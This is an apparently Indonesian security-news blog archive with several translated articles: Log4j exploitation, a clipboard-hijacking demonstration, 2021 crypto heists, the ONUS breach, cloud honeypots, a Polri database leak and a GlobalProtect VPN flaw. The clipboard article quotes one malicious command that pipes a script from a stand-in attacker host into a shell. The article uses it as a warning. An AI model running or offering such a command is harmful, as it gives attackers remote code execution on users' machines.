Naga Cyber Defense

Trusted Security for all of Indonesia

You are here: Home / Archives for Data

Data

Penyerang Mengeksploitasi Kelemahan Log4j dalam Serangan Hands-on-Keyboard untuk Menjatuhkan Kerang Terbalik

by

Microsoft minggu ini memperingatkan organisasi tentang potensi tinggi pelaku ancaman untuk memperluas penggunaan kerentanan eksekusi kode jarak jauh (RCE) yang baru ditemukan dalam kerangka logging Apache Log4j untuk melakukan berbagai serangan.

Banyak kelompok penyerang termasuk aktor negara-bangsa dan kelompok ransomware telah menambahkan eksploitasi untuk kerentanan ke kit serangan mereka dan menggunakannya untuk membuat cangkang terbalik, menjatuhkan toolkit akses jarak jauh, dan melakukan serangan langsung pada keyboard pada sistem yang rentan.

Backdoors dan reverse shell yang telah diamati Microsoft digunakan melalui kelemahan Log4j termasuk Bladabindi, HabitsRAT, Meterpreter, Cobalt Strike, dan PowerShell.

Pada 9 Desember, Apache Software Foundation mengungkapkan kerentanan kritis RCE (CVE-2021-44228) dalam komponen yang memberi penyerang cara yang relatif sepele untuk mendapatkan kendali penuh atas sistem yang rentan. Kurang dari seminggu setelah cacat pertama diungkapkan, Apache Foundation mengungkapkan cacat kedua di Log4j (CVE-2021-45046) dan kemudian beberapa hari kemudian, yang ketiga (CVE-2021-45105).

Prevalensi luas dari cacat dan kemudahannya untuk dieksploitasi elah menarik minat berbagai aktor ancaman. banyak vendor telah melaporkan mengamati operator ransomware; penambang cryptocurrency; aktor negara-bangsa dari negara-negara termasuk Iran, Turki, dan Cina; dan orang lain mencoba untuk mengeksploitasi kekurangan.

Pelaku ancaman persisten tingkat lanjut (APT) yang telah diamati mengeksploitasi kelemahan termasuk kelompok Hafnium yang berbasis di China yang bertanggung jawab untuk melakukan serangan zero-day terhadap apa yang disebut set ProxyLogon dari kelemahan Exchange Server tahun lalu. Aktor APT lain yang mengeksploitasi kelemahan Log4j termasuk Phosphorous, operator ransomware Iran, dan Aquatic Panda, aktor berbasis di China yang digagalkan CrowdStrike di tengah serangan yang ditargetkan pada organisasi akademik besar beberapa hari setelah kelemahan pertama terungkap.

CrowdStrike mengamati, pelaku ancaman berusaha mengeksekusi perintah Linux pada host Windows organisasi korban, kata Param Singh, wakil presiden layanan perburuan ancaman Falcon OverWatch CrowdStrike. Ketika upaya untuk mengeksekusi perintah Linux gagal, aktor ancaman dengan cepat beralih menggunakan layanan asli Windows atau yang disebut binari hidup di luar negeri (LOLBins).

Menurut Microsoft, Banyak aktivitas tampaknya berasal dari peneliti keamanan dan tim merah yang mencari kelemahan di jaringan mereka, namun di antara mereka yang memindai kelemahan adalah aktor ancaman, termasuk operator botnet seperti Mirai, mereka yang menargetkan sistem Elasticsearch yang rentan untuk menyebarkan penambang cryptocurrency, dan penyerang yang ingin menyebarkan pintu belakang Tsunami di sistem Linux.

Dalam banyak kampanye ini, penyerang menjalankan pemindaian bersamaan untuk sistem Windows dan sistem Linux yang rentan. Penyerang menggunakan perintah Base 64 yang disertakan dalam JDNI:ldap:// untuk meluncurkan perintah bash pada sistem Linux dan PowerShell pada Windows, kata Microsoft.

Microsoft dan banyak pakar keamanan lainnya telah mendesak organisasi untuk menyebarkan alat pemindaian dan skrip untuk mengidentifikasi kerentanan Log4j di lingkungan mereka. Tetapi karena cara kerja pengepakan Java, kerentanan dapat terkubur beberapa lapisan jauh di dalam aplikasi dan tidak mudah terlihat oleh pemindai, kata pakar keamanan.

Rezilion, misalnya, baru-baru ini menguji beberapa alat pemindaian sumber terbuka dan komersial untuk melihat seberapa efektif mereka dalam mendeteksi file Java di mana Log4j disarangkan dan dikemas dalam berbagai format. Alat pemindaian yang diuji termasuk dari Google, Palantir, Aqua Security, Mergebase, dan JFrog. Latihan menunjukkan bahwa sementara beberapa pemindai lebih baik daripada yang lain, tidak satu pun dari mereka yang mampu mendeteksi Log4j dalam semua format.

Sumber : Dark Reading

Aplikasi Tanya Jawab Populer, Curious Cat kehilangan domain, memposting tweet aneh

by

Aplikasi jejaring sosial populer, Curious Cat telah kehilangan kendali atas domainnya. Setelah platform mengumumkan kehilangan kendali atas domain mereka, serangkaian peristiwa aneh dan tanggapan dukungan telah membingungkan pengguna aplikasi yang sekarang tidak dapat mempercayai Curious Cat.

Kecurigaan awal layanan Curious Cat telah ditutup muncul sekitar 19 Desember, ketika pengunjung Curiouscat.qa disambut dengan halaman parkir yang bertentangan dengan layanan jejaring sosial.

Curiouscat.qa menampilkan pesan “Duduklah. Kami sedang menjalani pemeliharaan,” dengan logo kucing yang sama sekali berbeda dari logo resmi platform sosial.

Logo resmi Curious Cat (kiri) dan halaman web Curiouscat.qa terlihat hari ini (kanan)

Catatan WHOIS mengkonfirmasi bahwa sekitar tanggal 18 Desember domain tersebut telah memasuki status ‘pendingDelete’. Sebuah domain memasuki status ‘pendingDelete’ segera setelah masa tenggang setelah pemilik domain gagal memperbarui domain.

Empat hari yang lalu, akun Twitter Curious Cat memposting peringatan bahwa mereka telah kehilangan domain Curiouscat.qa mereka karena “kesalahan” dan bahwa layanan telah pindah ke domain Curiouscat.me dan Curiouscat.live.

Pada tahun 2020, Google kehilangan kepemilikan domain blogspot.in setelah gagal memperbaruinya tepat waktu. Setelah domain diambil alih oleh pihak ketiga, lebih dari 4,4 juta URL blogspot.in tidak lagi dapat diakses.

Namun, dalam kasus Curious Cat, seolah-olah hilangnya domain secara tiba-tiba itu sendiri tidak berubah, rangkaian kicauan platform mengikis kepercayaan pengguna lebih jauh.

Pada tanggal 27 Desember, permohonan dari akun media sosial Curious Cat untuk mengunduh “aplikasi iOS yang dipulihkan” membuat banyak orang bingung, dengan beberapa menahan diri dari pembaruan.

Sumber kebingungan lainnya adalah staf Spanyol Curious Cat yang tampaknya “meninggalkan [sic] untuk saat ini.”

Tim pendukung Curious Cat tampaknya “sekarang” dikelola oleh staf Korea, dilaporkan di balik tweet, meskipun asal perusahaan adalah Spanyol.

Curious Cat mengatakan mereka sekarang dikelola oleh tim Korea sekarang

Namun, itu belum berakhir. Di Google Play, pengguna aplikasi Android melaporkan masalah setelah aplikasi Curious Cat tidak dapat berkomunikasi dengan API Twitter, kemungkinan karena integrasi yang rusak.

Sangat mungkin, tweet Curious Cat yang mengacu pada aplikasi “pulih” yang diperbarui menunjukkan platform yang memulihkan integrasi API Twitter setelah nama domainnya diubah.

Namun, setelah serangkaian peristiwa aneh ini, banyak pelanggan Curious Cat [1, 2, 3, 4] telah memutuskan untuk menjaga jarak dari layanan tersebut, dengan beberapa memutuskan Curious Cat dari Twitter mereka hingga situasi menjadi lebih jelas.

Selengkapnya : Bleeping Computer

Jangan salin tempel perintah dari halaman web — Anda bisa diretas

by

Baru-baru ini, Gabriel Friedlander, pendiri platform pelatihan kesadaran keamanan Wizer mendemonstrasikan peretasan yang jelas namun mengejutkan yang akan membuat Anda berhati-hati dalam menyalin-menempelkan perintah dari halaman web.

Friedlander memperingatkan sebuah halaman web dapat secara diam-diam mengganti konten dari apa yang ada di clipboard Anda, dan yang lebih buruk lagi pengembang mungkin hanya menyadari kesalahan mereka setelah menempelkan teks, dan pada saat itu mungkin sudah terlambat.

Dalam bukti konsep sederhana (PoC) yang diterbitkan di blognya, Friedlander meminta pembaca untuk menyalin perintah sederhana yang akan dikenal oleh sebagian besar sysadmin dan pengembang:

Halaman HTML Friedlander dengan perintah sederhana yang dapat Anda salin ke clipboard

Sekarang, tempelkan apa yang Anda salin dari blog Friedlander ke dalam kotak teks atau Notepad, dan hasilnya mungkin akan membuat Anda terkejut:

curl http://attacker-domain:8000/shell.sh | SH

Anda tidak hanya mendapatkan perintah yang sama sekali berbeda di clipboard Anda, tetapi untuk memperburuk keadaan, ia memiliki karakter baris baru (atau kembali) di akhir.

Mereka yang menempelkan teks mungkin mendapat kesan bahwa mereka menyalin perintah sudo apt update yang familier dan tidak berbahaya yang digunakan untuk mengambil informasi terbaru pada perangkat lunak yang diinstal pada sistem Anda.

Keajaibannya ada pada kode JavaScript yang tersembunyi di balik pengaturan halaman HTML PoC oleh Friedlander. Setelah Anda menyalin teks “sudo apt update” yang terdapat dalam elemen HTML, cuplikan kode, yang ditampilkan di bawah ini berjalan.

Apa yang terjadi setelahnya adalah ‘pendengar acara’ JavaScript yang menangkap peristiwa penyalinan dan mengganti data papan klip dengan kode uji berbahaya Friedlander:

Kode JavaScript PoC yang menggantikan konten clipboard

“Inilah mengapa Anda TIDAK PERNAH menyalin perintah tempel langsung ke terminal Anda,” Friedlander memperingatkan.

“Anda pikir Anda menyalin satu hal, tetapi itu diganti dengan sesuatu yang lain, seperti kode berbahaya. Yang diperlukan hanyalah satu baris kode yang disuntikkan ke dalam kode yang Anda salin untuk membuat pintu belakang ke aplikasi Anda.”

Seorang pengguna Reddit juga menyajikan contoh alternatif dari trik ini yang tidak memerlukan JavaScript: teks tak terlihat yang dibuat dengan gaya HTML dan CSS yang disalin ke clipboard Anda saat Anda menyalin bagian teks yang terlihat:

HTML yang tidak terlihat (kiri) diambil selama salin-tempel dan memiliki garis tambahan (kanan)

“Masalahnya bukan hanya situs web dapat mengubah konten clipboard Anda menggunakan JavaScript,” jelas pengguna, SwallowYourDreams.

“Bisa juga hanya menyembunyikan perintah dalam HTML yang tidak terlihat oleh mata manusia, tetapi akan disalin oleh komputer.”

Jadi, alasan lain untuk tidak pernah secara membabi buta mempercayai apa yang Anda salin dari halaman web—lebih baik tempel di editor teks terlebih dahulu.

Sumber : Bleeping Computer

Peretas mencuri lebih dari $4 miliar dalam cryptocurrency tahun ini, berikut daftar lengkap pencurian crypto terbesar pada tahun 2021

by

Decentralized finance (DeFi) mengalami lonjakan pencurian terbesar ​​sektor yang baru dan masih berkembang, menjadikannya target yang menarik bagi pencuri.
Eksploitasi Poly Network, yang menghasilkan lebih dari $610 juta dalam koin kripto yang tersedot, bukan hanya serangan DeFi terbesar tahun ini, tetapi yang terbesar dalam semua sejarah DeFi.

Tahun ini peretas berhasil lolos dengan $4,25 miliar. Itu hampir tiga kali lipat dari tahun 2020, ketika sekitar $ 1,49 miliar aset crypto dicuri. Comparitech mengumpulkan data untuk menunjukkan bahwa pada tahun 2021 terjadi enam dari sepuluh peretasan crypto paling mahal sepanjang masa. cara mereka mencuri crypto tahun ini adalah melalui peretasan protokol keuangan terdesentralisasi (DeFi) dengan itu saja terhitung $ 1,4 miliar dari total dana crypto yang dicuri tahun ini.

Pertumbuhan popularitas token non-fungible (NFT) juga telah mendorong aktivitas baru di mana aktor jahat menemukan cara baru dan inovatif untuk mengelabui orang agar membeli aset digital palsu atau berinvestasi dalam penipuan.

Poly Network $610 juta dicuri pada Agustus 2021
Seorang peretas ‘topi putih’ melakukan peretasan cryptocurrency tunggal terbesar tahun ini, mengklaim telah melakukannya untuk mengekspos lubang keamanan dalam kontrak pintar ‘rantai silang’ yang digunakan oleh perusahaan.

Perusahaan kemudian menangguhkan transaksi dan memperbaiki bug, bahkan ketika bernegosiasi dengan peretas dan pertukaran untuk membekukan cryptocurrency yang dicuri untuk sementara. Seluruh jumlah yang dicuri diambil kembali selama seminggu. Mereka menawarkan pekerjaan dan hadiah $500.000, yang ditolak oleh peretas tetapi kemudian mengeluh karena tidak mendapatkan hadiah.

Poly Network adalah platform keuangan terdesentralisasi (DeFi) yang memungkinkan pengguna untuk meminjamkan, meminjam, dan memperdagangkan mata uang kripto dengan keuntungan. Kontrak pintar dibangun ke dalam token kripto, dengan persyaratan yang dijalankan sendiri yang menentukan apa yang harus dilakukan token dalam keadaan yang berbeda, misalnya, menjual ke entitas X seharga $17,99 jika harga turun di bawah $18.

Platform lintas rantai memungkinkan pengguna untuk bertransaksi di blockchain yang sama sekali berbeda, tetapi teknologinya masih berkembang, menjadikannya target yang menarik untuk diretas. Sejumlah peretasan kripto baru-baru ini menargetkan platform kripto DeFi yang menggunakan teknologi lintas rantai.

BitMart – $196 juta dicuri pada Desember 2021

Perusahaan mengatakan $ 100 juta dari kerugian itu ada di blockchain Ethereum, yang paling sering menjadi sasaran peretasan terbesar tahun ini.

CEO BitMart Sheldon Xia mengumumkan bahwa mereka akan berbicara dengan tim proyek crypto untuk mengidentifikasi solusi, dan menggunakan dana perusahaan sendiri untuk memberi kompensasi kepada pengguna yang terpengaruh.

Dompet panas digunakan oleh pertukaran crypto seperti BitMart, untuk menyimpan bagian paling likuid dari aset digital mereka, untuk transaksi yang lebih cepat atas nama pengguna. Dompet dingin, di sisi lain, menyimpan aset digital secara offline tanpa paparan internet, sehingga kurang rentan terhadap peretas.

Boy X Highspeed (BXH) – $139 juta dicuri pada November 2021

Kunci administrator yang bocor kehilangan BXH sebagian besar kepemilikan mereka di Binance Smart Chain (BSC). Penarikan pada blockchain BSC mereka ditangguhkan pada hari yang sama, dilanjutkan hanya empat minggu kemudian. Penyisiran keamanan mereka memakan waktu seminggu, dengan semua celah keamanan diklaim dapat dihilangkan dalam waktu dua minggu setelah serangan.

CEO mereka dan PeckShield, seorang peneliti keamanan blockchain independen, berspekulasi bahwa eksploitasi ini bisa menjadi ‘pekerjaan orang dalam’. Perusahaan menawarkan hadiah hingga $ 10 juta untuk mengidentifikasi para peretas, meskipun tidak ada pengumuman lebih lanjut mengenai identifikasi.

Vulcan Forged – $135 juta dicuri pada Desember 2021

Peretas membantu diri mereka sendiri ke kunci pribadi dompet crypto dari 96 pengguna, dari total 6501 pada saat itu. Mereka kemudian mencuri 9% dari semua token PYR yang tersedia (4,5 juta PYR), meninggalkan kerugian $135 juta. Pengguna yang terkena dampak telah dijanjikan penggantian dari cadangan perusahaan sendiri.

CEO Jamie Thomson mengatakan mereka akan menggunakan dompet terdesentralisasi, untuk mencegah masalah seperti itu di masa depan. Perusahaan telah memberikan hadiah sebesar $500.000 untuk mengidentifikasi peretas, dan juga berkoordinasi dengan bursa besar untuk mencoba dan mencegah peretas menjual token yang dicuri.

Vulcan Forged menyebut dirinya sebagai studio game GameFi yang membuat game play-to-earn (P2E) seperti Vulcan Verse dan Vulcan Chess, yang beroperasi menggunakan token PYR dan NFT mereka sendiri. Ini menjalankan pasar NFT untuk memungkinkan pemain menguangkan, dan pertukaran terdesentralisasi (DEX) untuk memperdagangkan cryptocurrency. Studio merencanakan peningkatan untuk mata uang PYR, tetapi peretasan menurunkan harganya sebesar 26% menurunkan kapitalisasi pasarnya sebesar 35%.

Cream Finance – $130 juta dicuri pada Oktober 2021

Dalam serangan yang mengeksploitasi fasilitas pinjaman kilatnya, peretas berhasil mencuri semua aset likuid yang dimiliki platform di blockchain Ethereum.

Perusahaan mengeluarkan pernyataan bahwa kerentanan telah ditambal dengan bantuan komunitas, dan bahwa aset blockchain mereka yang lain tidak terpengaruh. Dalam waktu kurang dari sebulan, perusahaan mengumumkan kompensasi untuk pengguna yang terkena dampak dari kantong mereka sendiri, yang didanai oleh alokasi token tim mereka.

KRIM. Finance, yang merupakan platform pinjaman DeFi, melaporkan tiga serangan lain tahun ini – pada bulan September ($18,8 juta), Agustus ($29 juta), dan Februari ($37 juta) – menambah kerugian sebesar $215 juta.

Badger DAO – $120 juta dicuri pada Desember 2021

Peretas mencuri aset berbasis Bitcoin dan Ethereum dari lusinan dompet pengguna, dalam serangan yang direncanakan secara strategis kode berbahaya disuntikkan ke front-end situs web platform hampir sebulan sebelumnya.

PeckShield mengidentifikasi kerugian terbesar 896 Bitcoin dari satu dompet yang bernilai $44 juta dengan harga saat ini. DAO telah menangguhkan aktivitas setelah mengetahui serangan itu, tetapi menyelesaikan penyelidikannya dalam seminggu dan kembali ke operasi normal. Komunitas Badger sedang mempertimbangkan rencana untuk memulihkan dana yang hilang, dan solusi untuk mengganti kerugian.

Liquid Global – $97 juta dicuri pada Agustus 2021

Peretas memperoleh akses ke dompet panas Liquid, menjarah Ether, Bitcoin, XRP, dan 66 mata uang lainnya. Aset berbasis Ethereum menyumbang lebih dari 78% dari kerugian.

Peretas mengalihkan sebagian dari jarahan mereka melalui platform terdesentralisasi seperti UniSwap, sementara aset yang ditransfer ke bursa kripto besar lainnya dibekukan atas permintaan Liquid. Bursa Jepang melanjutkan perdagangan setelah mentransfer dana yang tidak terpengaruh ke dompet dingin, dan meningkatkan keamanan untuk menerapkan brankas yang aman.

Pada akhir Agustus, Liquid mengatakan tidak akan ada dampak pada saldo pengguna. Untuk mengkompensasi pengguna dan menutupi kerugian mereka sendiri, perusahaan mengumpulkan $ 120 juta sebagai pinjaman dari pertukaran crypto FTX.

EasyFi – $80 juta dicuri pada April 2021

Seorang peretas menargetkan perangkat komputasi pendiri untuk mendapatkan kunci adminnya dan mentransfer mata uang ke dirinya sendiri. Kerugian awal adalah $6 juta stablecoin dan EASY senilai $120 juta, token asli dari proyek EasyFi.

Dampaknya pada pengguna terbatas ketika harga token EASY turun 50% dalam skenario likuiditas rendah, sehingga menyulitkan peretas untuk menjual tokennya. Selain itu, token ditingkatkan menjadi ‘EZ 2.0’ empat hari kemudian, membuat kepemilikan peretas tidak berguna. Dalam blognya, pendiri Ankitt Gaur menulis bahwa pengguna yang terkena dampak akan diberi kompensasi, 25% dalam bentuk stablecoin dan 75% sebagai token IOU.

AscendEX – $77,7 juta dicuri pada Desember 2021

Peretas membobol dompet panas AscendEX, pertukaran cryptocurrency yang berbasis di Singapura. Menurut perusahaan keamanan blockchain PeckShield, hampir 77% dari total kerugian terdiri dari aset berdasarkan blockchain Ethereum.

Pertukaran mengkonfirmasi bahwa dompet dingin mereka tidak terpengaruh, dan bahwa setiap pengguna yang terpengaruh akan “dilindungi sepenuhnya.” Layanan penyetoran dan penarikan ditangguhkan untuk peninjauan keamanan, tetapi layanan perdagangan telah dilanjutkan dalam seminggu. Perusahaan mengumumkan pada 23 Desember bahwa penyetoran dan penarikan telah dilanjutkan untuk sebagian besar mata uang utama.

bZx – $55 million stolen in November 2021
Dimulai sebagai serangan phishing sederhana dalam dokumen Word, peretas berhasil mengakses kunci pribadi platform dan ‘meningkatkan’ kontrak pintar untuk mentransfer dana. Sebagian besar kerugian berada di jaringan Polygon dan Binance Smart Chain (BSC), sementara infrastruktur terdesentralisasi mereka mengalami kerugian yang relatif lebih rendah dalam mata uang Ethereum.

platform bZx memberi tahu proyek dan pertukaran crypto lainnya untuk membekukan cryptocurrency yang dicuri. Perusahaan meminta perusahaan keamanan Kaspersky untuk menyelidiki, yang percaya para peretas adalah Grup Lazarus yang memiliki hubungan dengan Korea Utara.

Bahkan saat mereka terus melacak dana dan bekerja dengan lembaga penegak hukum, komunitas telah menyetujui rencana kompensasi untuk membantu mereka yang menderita kerugian akibat peretasan. bZx DAO (organisasi otonom terdesentralisasi) menyebut dirinya sebagai platform DeFi untuk perdagangan margin dan pinjaman.

Selengkapnya : Bussines Insider

Perusahaan Fintech yang terkena peretasan Log4j menolak untuk membayar uang tebusan $ 5 juta

by

Salah satu platform perdagangan crypto Vietnam terbesar, ONUS, baru-baru ini mengalami serangan cyber pada sistem pembayarannya yang menjalankan versi Log4j yang rentan.

Pelaku ancaman mendekati ONUS untuk memeras sejumlah $5 juta dan mengancam akan mempublikasikan data pelanggan jika ONUS menolak untuk mematuhinya. Setelah penolakan tersebut, pelaku memasang data hampir 2 juta pelanggan ONUS untuk dijual di forum.

Pada tanggal 9 Desember, eksploitasi PoC untuk kerentanan Log4Shell yang terkenal (CVE-2021-44228) bocor di GitHub. Dan, itu mendapat perhatian penyerang oportunistik yang mulai memindai internet secara massal untuk server yang rentan.

Antara 11 dan 13 Desember, pelaku ancaman berhasil mengeksploitasi kerentanan Log4Shell pada server Cyclos dari ONUS dan menanam pintu belakang untuk akses berkelanjutan.

Meskipun ONUS telah menambal instance Cyclos mereka, jendela eksposur memberikan waktu yang cukup bagi pelaku ancaman untuk mengekstrak database sensitif. Basis data ini berisi hampir 2 juta catatan pelanggan termasuk data E-KYC (Know Your Customer), informasi pribadi, dan kata sandi hash.

Alur kerja E-KYC yang digunakan oleh bank dan perusahaan FinTech biasanya melibatkan pengadaan beberapa bentuk dokumen identifikasi dan bukti dari pelanggan, bersama dengan ‘video selfie’ untuk verifikasi otomatis.

Menariknya, kerentanan Log4Shell ada di server kotak pasir yang digunakan “hanya untuk tujuan pemrograman” tetapi memungkinkan penyerang mengakses lebih lanjut ke lokasi penyimpanan data sensitif (ember Amazon S3) dengan data produksi, karena kesalahan konfigurasi sistem.

ONUS kemudian dilaporkan ditampar dengan permintaan pemerasan senilai $ 5 juta yang mereka tolak. Sebagai gantinya, perusahaan memilih untuk mengungkapkan serangan itu kepada pelanggan mereka melalui grup Facebook pribadi.

“Sebagai perusahaan yang mengutamakan keselamatan, kami berkomitmen untuk memberikan transparansi dan integritas kepada pelanggan kami dalam operasi bisnis,” kata CEO ONUS Chien Tran.

“Itulah sebabnya, setelah mempertimbangkan dengan cermat, hal yang benar yang perlu kita lakukan sekarang adalah memberi tahu seluruh komunitas ONUS tentang kejadian ini.”

Peretasan itu sendiri sedikit lebih dari sekadar masalah Log4j saja. Eksploitasi Log4j mungkin merupakan titik masuk bagi penyerang, tetapi kontrol akses yang tidak tepat pada bucket Amazon S3 ONUS memungkinkan penyerang mengakses secara tidak semestinya.

Pada 25 Desember, setelah gagal mengamankan jumlah pemerasan dari ONUS, pelaku ancaman memasang data pelanggan untuk dijual di pasar pelanggaran data,pelaku mengklaim memiliki salinan 395 tabel database ONUS dengan informasi pribadi pelanggan dan kata sandi hash yang mereka miliki.

Hampir 2 juta data pelanggan ONUS disiapkan untuk dijual di forum

Sampel juga termasuk gambar yang tidak diedit dari kartu ID pelanggan, paspor, dan klip video selfie yang dikirimkan pelanggan yang diperoleh selama proses KYC.

Rekomendasi CyStack untuk ONUS termasuk menambal kerentanan Log4Shell di Cyclos–seperti yang diinstruksikan oleh vendor, menonaktifkan kredensial AWS yang bocor, mengonfigurasi izin akses AWS dengan benar, memblokir akses publik ke semua bucket S3 yang sensitif, dan memberlakukan batasan tambahan.

Sekarang kerentanan log4j telah dieksploitasi oleh semua jenis pelaku ancaman dari peretas yang didukung negara hingga geng ransomware dan beberapa lainnya untuk menyuntikkan penambang kripto pada sistem yang rentan.

Geng ransomware Conti juga terlihat mengincar server VMWare vCenter yang rentan untuk dieksploitasi.

Pengguna Log4j harus segera meningkatkan ke versi terbaru 2.17.1 (untuk Java 8) yang dirilis kemarin. Versi yang di-backport 2.12.4 (Java 7) dan 2.3.2 (Java 6) yang berisi perbaikan diharapkan akan segera dirilis.

Selengkapnya : Bleeping Computer

Para peneliti menguji keamanan cloud dan terkejut dengan apa yang mereka temukan

by

Para peneliti telah menunjukkan kerentanan konfigurasi layanan cloud, setelah menyebarkan ratusan honeypot yang dirancang agar terlihat seperti infrastruktur yang tidak aman, beberapa di antaranya hanya bertahan beberapa menit sebelum disusupi oleh peretas.

Peneliti Palo Alto Networks menyiapkan honeypot yang dikompromikan dari 320 node di seluruh dunia, terdiri dari beberapa contoh layanan cloud umum yang salah dikonfigurasi, termasuk protokol desktop jarak jauh (RDP), protokol shell aman (SSH), blok pesan server (SMB) dan database Postgres.

Honeypot juga menyertakan akun yang dikonfigurasi untuk memiliki kata sandi default atau kata sandi yang lemah persis seperti yang dicari oleh penjahat dunia maya ketika mencoba menerobos jaringan.

Dan tidak lama kemudian penjahat dunia maya menemukan honeypot dan berusaha untuk mengeksploitasinya beberapa situs telah disusupi dalam hitungan menit sementara 80% dari 320 honeypots telah disusupi dalam waktu 24 jam. Semuanya telah dikompromikan dalam waktu seminggu.

Aplikasi yang paling banyak diserang adalah secure shell, yang merupakan protokol komunikasi jaringan yang memungkinkan dua mesin untuk berkomunikasi. Setiap honeypot SSH rata-rata dikompromikan 26 kali sehari. Honeypot yang paling banyak diserang telah disusupi sebanyak 169 kali hanya dalam satu hari.

Sementara itu, satu penyerang mengkompromikan 96% dari 80 honeypot Postgres dalam satu periode 90 detik.

Layanan cloud yang terbuka atau tidak dikonfigurasi dengan baik seperti yang digunakan di honeypot menjadi target yang menggoda bagi semua jenis penjahat cyber.

Beberapa operasi ransomware terkenal diketahui mengeksploitasi layanan cloud yang terbuka untuk mendapatkan akses awal ke jaringan korban untuk akhirnya mengenkripsi sebanyak mungkin dan meminta tebusan jutaan dolar sebagai ganti kunci dekripsi.

Sementara itu, kelompok peretas yang didukung negara juga diketahui menargetkan kerentanan dalam layanan cloud sebagai cara diam-diam memasuki jaringan untuk melakukan spionase, mencuri data, atau menyebarkan malware tanpa deteksi.

“Ketika layanan yang rentan terpapar ke internet, penyerang oportunistik dapat menemukan dan menyerangnya hanya dalam beberapa menit. Karena sebagian besar layanan yang terhubung ke internet ini terhubung ke beberapa beban kerja cloud lainnya, layanan apa pun yang dilanggar berpotensi menyebabkan kompromi seluruh lingkungan cloud,” kata Chen.

Ketika mengamankan akun yang digunakan untuk mengakses layanan cloud, organisasi harus menghindari penggunaan kata sandi default dan pengguna harus diberikan autentikasi multi-faktor untuk membuat penghalang tambahan demi mencegah kredensial bocor dieksploitasi.

Penting juga bagi organisasi untuk menerapkan patch keamanan saat tersedia untuk mencegah penjahat cyber mengambil keuntungan dari eksploitasi yang diketahui dan ini adalah strategi yang juga berlaku untuk aplikasi cloud.

Sumber : ZDNet

Web Server Polri Diretas oleh Peretas Brasil

by

Dilansir dari CyberThreat.id, seorang peretas asal Brasil bernama son1x mengklaim bahwa ia telah meretas web server dari subdomain milik Polri. Tidak hanya satu web server namun 3 web server yang berhasil ia retas. Lebih buruknya lagi, basis data yang diduga berasal dari salah satu server, ia bagikan secara gratis di akun Twitter nya.

Peretas ini adalah peretas yang sama yang melakukan deface pada situs web Pusat Malware Nasional milik Badan Siber dan Sandi Negara pada akhir Oktober kemarin. Ia mengklaim sebetulnya bisa masuk lebih dalam lagi ke server BSSN, tapi dirinya takut dipenjara.

Baru-baru ini, ia kembali berulah dengan merusak empat subdomain Badan Pengkajian dan Penerapan Teknologi (BPPT) dan satu subdomain Goverment Certification Authority (GovCA), yaitu otoritas yang mengotentikasi pihak yang akan bertransaksi khususnya di pemerintahan. GovCa dibentuk oleh BPPT.

Ia mengatakan bahwa semenjak ia meretas BSSN, ada beberapa upaya Polri untuk mencari tahu tentang dirinya.

Basis data yang ia bocorkan berisi informasi pribadi dan kredensial pegawai Polri dan orang-orang yang terlibat di dalamnya.

Dari pengamatan CyberThreat.id, basis data tersebut berisi:

  • Nama
  • Tempat tanggal lahir
  • Satker
  • Pangkat
  • Status pernikahan
  • Jabatan
  • Alamat
  • Pangkat terakhir
  • Agama
  • Golongan darah
  • Suku
  • pen_umum_terakhir
  • pen_polri_terakhir
  • pen_jurusan_terakhir
  • pen_jenjang_terakhir
  • rehab_no_putusan
  • rehab_tanggal_putusan_sidang
  • rehab_id_jenis_pelanggaran
  • id_propam
  • s_tgl_hukuman_selesai
  • s_tgl_hukuman_mulai
  • s_tgl_rehab_mulai
  • s_tgl_rehab_selesai
  • s_tgl_binlu_mulai
  • s_tgl_binlu_selesai
  • email
  • no_hp.[]

Sumber: Cyberthreat.id

Peneliti menunggu 12 bulan untuk melaporkan kerentanan dengan 9,8 dari 10 peringkat keparahan

by

Sekitar 10.000 server perusahaan yang menjalankan Palo Alto Networks GlobalProtect VPN rentan terhadap bug buffer overflow yang baru saja ditambal dengan peringkat keparahan 9,8 dari kemungkinan 10.

Randori menemukan kerentanan 12 bulan yang lalu dan sebagian besar waktu itu digunakan secara pribadi dalam produk tim merahnya yang membantu pelanggan menguji pertahanan jaringan mereka terhadap ancaman dunia nyata. Norma di kalangan profesional keamanan adalah peneliti secara pribadi wajib melaporkan kerentanan tingkat tinggi kepada vendor sesegera mungkin daripada menimbunnya secara rahasia.

CVE-2021-3064, saat kerentanan dilacak merupakan cacat buffer overflow yang terjadi saat mem-parsing input yang disediakan pengguna di lokasi dengan panjang tetap pada stack. Eksploitasi proof-of-concept yang dikembangkan peneliti Randori menunjukkan kerusakan besar yang dapat terjadi.

Selama beberapa tahun terakhir, peretas telah aktif mengeksploitasi kerentanan dalam serangkaian firewall dan VPN perusahaan seperti Citrix, Microsoft, dan Fortinet, lembaga pemerintah memperingatkan awal tahun ini. Produk perusahaan serupa, termasuk dari Pulse Secure dan Sonic Wall, juga diserang. Sekarang, GlobalProtect Palo Alto Networks mungkin siap untuk bergabung dalam daftar.

CVE-2021-3064 hanya memengaruhi versi yang lebih lama dari PAN-OS 8.1.17, tempat GlobalProtect VPN berada. Peneliti independen Kevin Beaumont mengatakan pencarian Shodan yang dia lakukan menunjukkan bahwa kira-kira setengah dari semua contoh GlobalProtect yang dilihat oleh Shodan rentan.

Luapan terjadi ketika perangkat lunak mem-parsing input yang disediakan pengguna di lokasi dengan panjang tetap di tumpukan. Kode buggy tidak dapat diakses secara eksternal tanpa memanfaatkan apa yang dikenal sebagai penyelundupan HTTP, teknik eksploitasi yang mengganggu cara situs web memproses urutan permintaan HTTP. Kerentanan muncul ketika frontend dan backend situs web menafsirkan batas permintaan HTTP secara berbeda, dan kesalahan menyebabkan mereka tidak sinkron.

Kebingungan merupakan hasil dari kode yang menyimpang dari spesifikasi ketika berhadapan dengan header Content-Length dan Transfer-Encoding. Dalam prosesnya, bagian dari permintaan dapat ditambahkan ke permintaan berikutnya yang memungkinkan respons dari permintaan yang diselundupkan diberikan kepada pengguna lain. Kerentanan penyelundupan permintaan sering kali kritis karena memungkinkan penyerang melewati kontrol keamanan, mendapatkan akses tidak sah ke data sensitif, dan secara langsung membahayakan pengguna aplikasi lain.

Randori mengatakan bahwa risikonya sangat akut untuk versi virtual dari produk yang rentan karena tidak memiliki pengacakan tata letak ruang alamat — mekanisme keamanan yang biasanya disingkat ASLR yang dirancang untuk sangat mengurangi kemungkinan eksploitasi yang berhasil — diaktifkan.

